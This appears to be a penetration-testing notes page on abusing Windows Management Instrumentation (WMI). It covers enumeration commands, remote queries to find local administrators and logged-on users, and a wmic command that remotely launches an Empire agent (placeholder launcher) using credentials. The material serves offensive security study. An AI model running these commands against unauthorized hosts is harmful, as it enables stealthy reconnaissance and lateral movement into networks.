2021-01-20 17:41:14 +00:00

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How Does it works

Wmi allows to open process in hosts where you know username/password/Hash. Then, Wmiexec uses wmi to execute each command that is asked to execute this is why Wmicexec gives you semi-interactive shell.

dcomexec.py: This script gives a semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints ShellBrowserWindow DCOM object. Currently, it supports MMC20. Application, Shell Windows and Shell Browser Window objects. from [here](https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/)

WMI Basics

Namespace: WMI is divided into a directory-style hierarchy, the \root container, with other directories under \root. These "directory paths" are called namespaces.
List namespaces:

#Get Root namespaces
gwmi -namespace "root" -Class "__Namespace" | Select Name

#List all namespaces (you may need administrator to list all of them)
Get-WmiObject -Class "__Namespace" -Namespace "Root" -List -Recurse 2> $null | select __Namespace | sort __Namespace

#List namespaces inside "root\cimv2"
Get-WmiObject -Class "__Namespace" -Namespace "root\cimv2" -List -Recurse 2> $null | select __Namespace | sort __Namespace

List classes of a namespace with:

gwmwi -List -Recurse #If no namespace is specified, by default is used: "root\cimv2"
gwmi -Namespace "root/microsoft" -List -Recurse

Classes: The WMI class name eg: win32_process is a starting point for any WMI action. We always need to know a Class Name and the Namespace where it is located.
List classes starting with win32:

Get-WmiObject -Recurse -List -class win32* | more #If no namespace is specified, by default is used: "root\cimv2"
gwmi -Namespace "root/microsoft" -List -Recurse -Class "MSFT_MpComput*"

Call a class:

#When you don't specify a namespaces by default is "root/cimv2"
Get-WmiObject -Class win32_share
Get-WmiObject -Namespace "root/microsoft/windows/defender" -Class MSFT_MpComputerStatus

Method: WMI classes have one or more functions that can be executed. These functions are called methods

WMI Enumeration

Check WMI service

This how you can check if WMI service is running:

#Check if WMI service is running
Get-Service Winmgmt
Status   Name               DisplayName
------   ----               -----------
Running  Winmgmt            Windows Management Instrumentation

#From CMD
net start | findstr "Instrumentation"

System Information

Get-WmiObject -ClassName win32_operatingsystem | select * | more

Process Information

Get-WmiObject win32_process | Select Name, Processid

From an attacker's perspective, WMI can be very valuable in enumerating sensitive information about a system or the domain.

wmic computerystem list full /format:list  
wmic process list /format:list  
wmic ntdomain list /format:list  
wmic useraccount list /format:list  
wmic group list /format:list  
wmic sysaccount list /format:list  
 Get-WmiObject Win32_Processor -ComputerName -Credential $cred

Manual Remote WMI Querying

For example, here's a very stealthy way to discover local admins on a remote machine note that domain is the computer name:

wmic /node:ordws01 path win32_groupuser where (groupcomponent="win32_group.name=\"administrators\",domain=\"ORDWS01\"")  

Another useful oneliner is to see who is logged on to a machine for when you're hunting admins:

wmic /node:ordws01 path win32_loggedonuser get antecedent  

wmic can even read nodes from a text file and execute the command on all of them. If you have a text file of workstations:

wmic /node:@workstations.txt path win32_loggedonuser get antecedent  

We'll remotely create a process over WMI to execute a Empire agent:

wmic /node:ordws01 /user:CSCOU\jarrieta path win32_process call create "**empire launcher string here**"  

We see it executed successfully ReturnValue = 0. And a second later our Empire listener catches it. Note the process ID is the same as WMI returned.

All this information was extracted from here: https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/